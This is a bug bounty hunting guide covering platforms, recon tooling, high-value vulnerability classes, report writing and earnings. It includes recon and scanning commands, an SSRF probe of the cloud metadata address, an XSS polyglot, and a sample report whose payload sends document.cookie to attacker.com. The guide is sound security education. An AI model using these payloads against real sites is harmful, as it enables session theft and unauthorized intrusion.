Key Takeaways
- Top hunters earn $500K-$2M+ annually
- Reconnaissance is 80% of successful hunting
- Report quality directly impacts payout amounts
- Specialization beats broad, shallow testing
Contents
1. What is Bug Bounty Hunting?
Bug bounty hunting is the practice of finding security vulnerabilities in websites and applications for rewards. Companies like Google, Microsoft, and Facebook pay researchers thousands of dollars for valid security reports. It's a legal way to hack—with authorization—and get paid.
Bounty Examples
- Google: Up to $31,337 for critical bugs
- Apple: Up to $1,000,000 for zero-click kernel RCE
- Microsoft: Up to $250,000 for Azure vulnerabilities
- Facebook: $500 - $50,000+ per bug
2. Major Bug Bounty Platforms
HackerOne
Bugcrowd
Intigriti
Synack (invite only)
YesWeHack
Cobalt
Choosing Programs
- Start with VDPs: Vulnerability Disclosure Programs (no bounty) for practice
- Wide scope programs: More assets = more opportunities
- Responsive programs: Check average response time
- Avoid "No bounty table": Focus on programs with clear payouts
3. The Hunting Methodology
The 4-Phase Approach
- Reconnaissance: Discover all assets, subdomains, technologies
- Mapping: Understand application functionality, user roles
- Vulnerability Discovery: Test for security issues
- Exploitation & Reporting: Prove impact, write clear report
4. Reconnaissance Deep Dive
Subdomain Enumeration
# Passive subdomain discovery
subfinder -d target.com -o subs.txt
amass enum -passive -d target.com
assetfinder --subs-only target.com
# Active subdomain bruteforce
gobuster dns -d target.com -w wordlist.txt
# Combine and resolve
cat subs.txt | httpx -silent -o live_hosts.txt
# Find subdomain takeovers
subjack -w subs.txt -t 100 -o takeovers.txtContent Discovery
# Directory brute forcing
feroxbuster -u https://target.com -w /path/to/wordlist
# Parameter discovery
arjun -u https://target.com/page
# JavaScript analysis
cat urls.txt | getJS --complete | tee js_files.txt
cat js_files.txt | xargs -I% bash -c 'python3 LinkFinder.py -i % -o cli'
# Wayback Machine
echo target.com | waybackurls | tee wayback.txt
cat wayback.txt | grep -E "\\.js$" | sort -uTechnology Fingerprinting
# Identify tech stack
whatweb https://target.com
wappalyzer-cli https://target.com
# CMS detection
nuclei -u https://target.com -t technologies/
# Check for known CVEs based on versions
nuclei -u https://target.com -t cves/5. High-Value Vulnerabilities
Critical Bugs ($10K-$100K+)
- Remote Code Execution (RCE): Command injection, SSTI, deserialization
- Authentication Bypass: Access admin without credentials
- SQL Injection: Database access, data exfiltration
- SSRF to Internal Services: Access cloud metadata, internal APIs
High Bugs ($1K-$10K)
- IDOR/BOLA: Access other users' data
- Stored XSS: Account takeover via session theft
- Privilege Escalation: User to admin
- Sensitive Data Exposure: API keys, credentials in responses
# Quick SSRF check
echo "https://target.com/api/fetch?url=http://169.254.169.254/" | httpx
# IDOR testing
# Original: GET /api/users/123/profile
# Test: GET /api/users/124/profile (other user's data)
# XSS polyglot
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcLiCk=alert() )//6. Writing Reports That Pay
Report Structure
- Title: Clear, specific description
- Severity: Use CVSS or platform scale
- Description: Technical explanation
- Steps to Reproduce: Exact, reproducible steps
- Proof of Concept: Screenshots, video, code
- Impact: Real-world consequences
- Remediation: How to fix
## Title: Stored XSS in Profile Bio Leads to Account Takeover
## Severity: High (8.1)
## Description
A stored XSS vulnerability exists in the user profile bio field at
/settings/profile. The application fails to sanitize user input before
rendering it in other users' browsers.
## Steps to Reproduce
1. Login to account A
2. Navigate to Settings > Profile
3. In the "Bio" field, enter: <script>fetch('https://attacker.com/steal?c='+document.cookie)</script>
4. Save profile
5. Login to account B, view user A's profile
6. Observe JavaScript execution and cookie theft
## Impact
An attacker can steal session cookies of any user who views their profile,
leading to complete account takeover of victim accounts.7. Essential Bug Bounty Tools
- Burp Suite Pro: Web proxy, scanner, Intruder ($449/year)
- Subfinder/Amass: Subdomain enumeration
- Nuclei: Template-based vulnerability scanning
- FFUF/Feroxbuster: Fast content discovery
- SQLMap: SQL injection automation
- httpx: HTTP probing and analysis
8. Maximizing Earnings
Pro Tips
- Specialize: Master one vuln class (SSRF, OAuth, GraphQL)
- Hunt new programs: Less competition, more low-hanging fruit
- Chain vulnerabilities: IDOR + CSRF = higher impact = higher payout
- Build reputation: Higher signal = private program invites
- Automate recon: More assets covered = more bugs found
FAQ
How long before I find my first bug?
Most beginners find their first valid bug within 1-3 months of consistent hunting. Focus on learning, not earnings initially.
Can I do bug bounty full-time?
Yes, top hunters earn $200K-$2M+ annually. However, income is inconsistent. Build savings and reputation before going full-time.
What's the best vulnerability to specialize in?
Business logic flaws, authentication bypasses, and API vulnerabilities are consistently high-value and hard to automate.